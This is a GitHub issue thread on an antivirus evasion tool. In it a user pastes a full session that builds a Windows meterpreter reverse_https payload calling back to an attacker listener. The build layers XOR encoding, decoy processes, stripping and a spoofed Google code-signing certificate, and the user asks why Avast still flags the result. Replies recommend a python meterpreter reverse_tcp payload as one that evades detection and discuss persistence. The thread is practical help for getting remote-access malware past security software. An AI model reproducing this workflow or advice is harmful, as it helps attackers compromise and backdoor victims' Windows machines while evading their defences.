oddcod3 / Phantom-Evasion

Python antivirus evasion tool
GNU General Public License v3.0
1.39k stars 334 forks source link

How to generate undetable payload? #47

Open w4cky opened 5 years ago

w4cky commented 5 years ago

I have a problem. Every payload that I create for Windows detects even free Avast. What am I doing wrong? I tried various options for Windows. I will paste one of them below so that you can see exactly.

I tried - Windows modules -> Shellcode Injection or Stager -> I've probably tried all the options for these modules.

Can you tell me what I'm doing wrong? ;)

[] choose how to supply shellcode:

[1] Msfvenom

[2] Custom shellcode

[0] Back

[>] Please insert option: 1

[>] Please enter msfvenom payload (example: windows/meterpreter/reverse_tcp):windows/meterpreter/reverse_https

[>] Please insert LHOST: 192.168.51.2

[>] Please insert LPORT: 443

[>] Custom msfvenom options(default: blank):

[>] Encoding step:

[1] x86/xor_dynamic (average)

[2] x86/xor_dynamic + Multibyte-key xor (good)

[3] x86/xor_dynamic + Double Multibyte-key xor (excellent)

[4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)

[>] Please enter options number: 4

[>] Enter output filename: michal-443

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes consequentialy.

Only the last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): y

[>] Insert number of decoy processes (integer between 1-3): 2

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/xor_dynamic x86/xor_dynamic succeeded with size 519 (iteration=0) x86/xor_dynamic chosen with final size 519 Payload size: 519 bytes Final size of c file: 2205 bytes

[>] Triple-key Xor multibyte encoding...

[>] Compiling...

[>] Strip

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n):y

[>] Stripping...

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n):y

Certificates directory is not empty , use already existing certificate? (y/n): n

[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.google.com:443

[>] Insert sign software description (default: Notepad Benchmark Util):

[>] Signing m443.exe with osslsigncode...

[>] Succeeded

[<>] File saved in Phantom-Evasion folder

dsx12 commented 5 years ago

Windows defender has stepped their game up likely you can't backdoor them anymore even msf5 evasion modules were patched a few days after release..

EnumType commented 5 years ago

You can use the python/meterpreter/reverse_tcp payload. It works for me :D

pretech86 commented 5 years ago

@thejavaezception can you explain more please ? I can’t found python payload in phantom evasion choice ? Can you explain more please ?

azamet90 commented 4 years ago

You can use the python/meterpreter/reverse_tcp payload. It works for me :D

yes but you cannot make it persistence (you just answering for answering)